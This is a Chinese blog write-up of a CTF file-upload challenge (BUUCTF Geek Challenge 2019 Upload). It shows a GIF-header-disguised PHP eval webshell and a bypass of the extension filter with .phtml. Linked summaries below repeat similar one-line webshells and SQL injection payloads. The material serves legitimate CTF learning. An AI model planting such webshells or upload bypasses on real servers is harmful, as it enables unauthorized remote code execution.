日常练习之web(极客大挑战 2019 Upload)

最新推荐文章于 2023-11-25 16:57:05 发布
最新推荐文章于 2023-11-25 16:57:05 发布
阅读量113 收藏
点赞数
分类专栏: web 文章标签: upload
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/doraemon12345/article/details/110404314
版权
该博客内容涉及一个Web安全问题,用户通过上传带有PHP代码的头像文件(.phtml格式)成功绕过后缀名检测,实现了PHP代码注入。攻击者使用蚁剑连接并执行命令,最终获取到flag。此过程揭示了网站文件上传的安全隐患。
摘要由CSDN通过智能技术生成

看题目是一件文件上传题,让上传头像,那就传个一句话木马
常用的木马网上也有,这里给出一个这道题用的一个

GIF89a? 
<script language="php">eval($_REQUEST[pass])</script>

一般绕过后缀名检测有php,php3,php5,pht,phtml等几种类型,这里采用phtml

在这里插入图片描述上传成功,拿出蚁剑连接一下
http://xxx(题目的链接)/upload/22.phtml
成功后选择在虚拟终端打开,cat flag

在这里插入图片描述
拿到flag{49f67b50-7e32-4cac-8241-ac54375cd08d}

south_1
关注
专栏目录
BUUCTF-Web:[极客挑战 2019]Upload
m0_56161093的博客
05-29 885
题目 解题过程 1、上传文件 从网页上来看是上传一个图片文件,但我们不知道他的检查上传的文件,所以可以试一试上传各种文件。一般检查文件的地方有:后缀名、content-type、文件头的部分内容。 这里我们先上传一个php文件,不做任何修改。如下图: 结果如下: 2、修改文件后缀名和content-type 将文件名修改为test.phtml,绕过常规php文件后缀检测 将文件类型修改为:image/jpeg 注意:phtml一般是指嵌入了php代码的html文件,但是同样也会作为php解析 修
[极客挑战 2019]Upload 1(文件上传)
weixin_45253573的博客
12-08 1万+
打开环境是一个上传图片的页面。 先上传一句话木马试试,这里格式直接不变,先上传看看。 <?php eval($_POST['b'])?> <?php $_GET['a']($_POST['b'])?> 提示说不是图片,需要抓包改文件格式。将Content-Type里面的格式改为image/jpeg 绕过后缀的有文件格式有php,php3,php4,php5,phtml.pht 前几个php格式的一句话都被b了,比如php3 将文件格式改到phtml可以了,但带<?的一句话
Web设计挑战:学习Web设计的挑战
02-16
Web设计挑战:学习Web设计的挑战
BUUCTF——[极客挑战2019]Upload-1
最新发布
weixin_62248541的博客
11-25 545
BUUCTF-[极客挑战2019]Upload-1
[极客挑战 2019]Upload
qq_52963704的博客
03-23 192
[极客挑战 2019]Upload–个人写题日记 打开靶机,可以看到这是一个让我们上传图片的界面 在这里,我们可以试着上传一句话木马,打开文本编辑器,输入代码<script language="php">eval($_POST['shell']);</script>用phtml的格式上传。.phtml格式的文件是php和html结合的网页文件。 改文件后缀名 进入靶机,上传木马文件,发现不能上传成功,此时说该文件不是image。所以我们需要改文件格式,可以使用burpsuit抓包
[极客挑战 2019]Upload 1
xixixihan的博客
11-25 789
做题分享
CTF-Web-[极客挑战 2019]Upload
归子莫的博客
05-03 4999
CTF-Web-[极客挑战 2019]Upload 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Web类,[极客挑战 2019]Upload 打开题目的实例 思路 做一个phtml的文件 将...
极客挑战 2019 Upload 1
qq_52715164的博客
04-20 2525
还是文件上传得题,上传有一句话木马写的且改后缀为jpg得文件,会出现提示说文件包含`<?传不了,所以修改木马为: GIF89a? <script language="php">eval($_REQUEST[123])</script> 打开burp,抓包修改文件后缀, 发现php上传不了, 常规文件后缀为: php2, php3, php4, php5, phps, pht, phtm, phtml 这里修改后缀为:phtml可正常上传 但上传后没有返回图片保存地址,一般上
【BUUCTF-Web】[极客挑战 2019]Upload
weixin_49298681的博客
01-05 1094
Upload=> 文件上传漏洞。
极客挑战2019Upload解题
Bird&Bird
10-26 3842
1、打开BUUCTF在线评测,选择web---->【极客挑战2019Upload。 2、首先上一句话木马。 报错了,说明进行了前端过滤非图片格式文件。 3、 将文件后缀名改为.jpg后在上传。 报错,说明进行了后端过滤,文件内容不能包含'<?'。 4、修改文件内容,然后上传。 继续报错 应该是对图片头进行了校验,那添加图片头,然后上传。 终于上传成功了,但此时我们上传的是一个.jpg图片,利用不了。 5、通过bp抓包,并修改图片后...
BUUCTF WEB [极客挑战 2019]PHP
Y1da的博客
04-16 1004
BUUCTF WEB [极客挑战 2019]PHP 题目提示网站存在备份,使用御剑扫描目录,发现备份文件 http://9ce7b58e-0829-4ed4-b7ca-7a1b7fd02741.node4.buuoj.cn:81/www.zip 下载后解压,得到index.php、class.php、flag.php等文件。 index.php(部分代码) <?php include 'class.php'; $select = $_GET['select']; $res=unser
[极客挑战 2019]LoveSQL Writeup(超级详细)
StevenOnesir的博客
11-27 2325
今天再讲一道sql的题,同样比较基础,但是相较于前面某道 1’ or 1=1#或者 1’ or ‘1’='1的题来讲要稍好一些。 首先我们玩一玩老套路,绕过登录进去看一看,发现回显: 这行数字,直观看上去像是16进制,转换一下得到: 直观看上去没有什么用 我们试一试常规的注入手段。 payload:union select 出现报错回显: 说明应该没啥过滤,老老实实爆数据库名-表名-字段就行了。 payload:1' union select * from a# 报错回显是: 所以这里相当于直接告诉
[极客挑战 2019] web题-LoveSQL
BROTHERYY的博客
07-07 300
复现环境:buuoj.cn 打开环境是一个登录框 sql注入,寻找闭合方式 登录成功,以为到这里就结束了,结果没这么简单,继续注入 tips:在url中输入的,所以不能用#,要用url编码%23 得到数据库名字 得到geek库里所有的表 继续注入得到字段名 dump出数据,结果这里发现geekuser里面没有数据,返回注入l0ve1ysq1这个表 flag{e503ad68-34dc-4b23-a315-046762d91322} 太长了截图不能截全,拉一下滑动条。 ...
2020第十一届极客挑战——Geek Challenge(部分解)
热门推荐
weixin_45794666的博客
12-19 2万+
Crypto 二战情报员刘壮 考点:摩斯密码 通过 1.简介中直接看出是摩斯密码 2.通过在线网站直接解密得到flag 铠甲与萨满 考点:凯撒密码 1.通过题目和提示知道是凯撒密码 2.通过CrakTools直接解密找到SYC即可 成都养猪二厂 考点:猪圈密码,栅栏密码 1.[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-w1bVRQgi-1608350560768)(http://image.liangyueliangyue.top/writeup-image/image
[极客挑战 2019]LoveSQL wp
{OvEr}的博客
11-19 178
[极客挑战 2019]LoveSQL wp 打开页面是这样的,我们先试试万能密码 显示登陆成功,通过上面的url可以判断有sql注入且为get方式下面我们来进行注入。 首先我们来查列数,注入 ?username=admin&password=123 %27 order by 4%23 发现不存在,说明有1,2,3列,继续我们来找注入点,注入语句 ?username=admin&password=123 %27 union select 1,2,3 %23 找到注入点是2,3
[极客挑战 2019]HardSQL
叶子的Blog
10-21 172
基础知识 基于extractvalue()和updatexml()的报错注入 FUZZ测试 写一个python 脚本跑一下屏蔽了什么关键字。 import requests fuzzdict = open('sqldict.txt').readlines() #sqldict.txt 存放了测试数据,按行读取 url='http://a247ca21-77c7-4087-b935-b40f8bc38fa1.node4.buuoj.cn:81/check.php' Passtext = 'Wrong
BUUCTF[极客挑战 2019]LoveSQL1
weixin_53955759的博客
06-18 207
这一题和easysql页面一样
[极客挑战 2019]BuyFlag --BUUCTF
金 帛的博客
06-13 206
BUUCTF记录贴
buuctf web 极客挑战2019
08-24
嗨!对于BUUCTF Web极客挑战2019,我了解到它是一个网络安全比赛,由北方工业大学举办。这个比赛旨在考察参赛者的网络攻防能力和Web漏洞挖掘技术。比赛的题目涵盖了Web安全的各个方面,包括但不限于漏洞利用、代码审计和网络协议等。参赛者需要通过解决各个题目来获取相应的flag,以证明自己的能力。如果你有具体的问题或需要更详细的信息,我会尽力帮助你。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值